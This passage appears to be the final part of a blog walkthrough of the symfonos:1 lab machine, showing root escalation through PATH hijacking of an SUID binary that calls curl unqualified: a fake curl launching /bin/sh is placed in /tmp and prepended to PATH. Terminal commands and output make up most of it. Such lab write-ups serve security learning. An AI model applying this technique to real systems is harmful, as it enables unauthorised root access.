Upon running /opt/statuscheck , we discover that it outputs HTTP header data, indicating it interacts with a web server, possibly with elevated privileges. This suggests we might exploit it to gain root access. 


Exploiting SUID Binary with Path Injection

We proceed by checking the file type of  /opt/statuscheck  with the ` file ` command, which identifies it as a 64-bit ELF executable with SUID permissions. 

helios@symfonos:/home/helios$ file /opt/statuscheck
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/home/helios$ 

To explore further, we run the ` strings ` command on it, which extracts embedded strings. 

helios@symfonos:/home/helios$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
prog.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
helios@symfonos:/home/helios$ 

Among them, we find curl -I  and http://localhost , suggesting that the binary uses curl  to make HTTP requests.

To exploit this, we create a malicious ` curl ` file in the ` /tmp ` directory. We first navigate to ` /tmp ` with ` cd /tmp `, then use ` echo "/bin/sh" ` to create a file that will launch a shell when executed. We change its permissions to ` chmod 777 curl ` to make it executable. Next, we need to ensure the ` /tmp ` directory is prioritized in the `PATH` environment variable, so our fake ` curl ` is used when ` /opt/statuscheck ` is executed.

helios@symfonos:/home/helios$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/bash" > curl
helios@symfonos:/tmp$ ls -al
ls -al
total 12
drwxrwxrwt  2 root   root   4096 Nov 22 07:06 .
drwxr-xr-x 22 root   root   4096 Jun 28  2019 ..
-rw-r--r--  1 helios helios   10 Nov 22 07:06 curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$

We prepend ` /tmp ` to the `PATH` with ` export PATH=/tmp:$PATH `. Afterward, we run ` /opt/statuscheck ` again, which now executes our malicious ` curl ` and spawns a root shell.

helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
#

To confirm root access, we run ` whoami `, which should return "root." 

# whoami
whoami
root

We then navigate to the ` /root ` directory and list its contents with ` ls -al `, where we find a file named ` proof.txt `.

# cd /root
cd /root
# ls -al
ls -al
total 24
drwx------  2 root root 4096 Jun 28  2019 .
drwxr-xr-x 22 root root 4096 Jun 28  2019 ..
lrwxrwxrwx  1 root root    9 Jun 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28  2019 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28  2019 proof.txt

Finally, we view the contents of `proof.txt` using the ` cat ` command. 

# cat proof.txt 
cat proof.txt

        Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

        Contact me via Twitter @zayotic to give feedback!


The file confirms successful root access and includes a congratulatory message, marking the completion of the task.

If you have any doubts or questions, feel free to leave them in the comment section.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!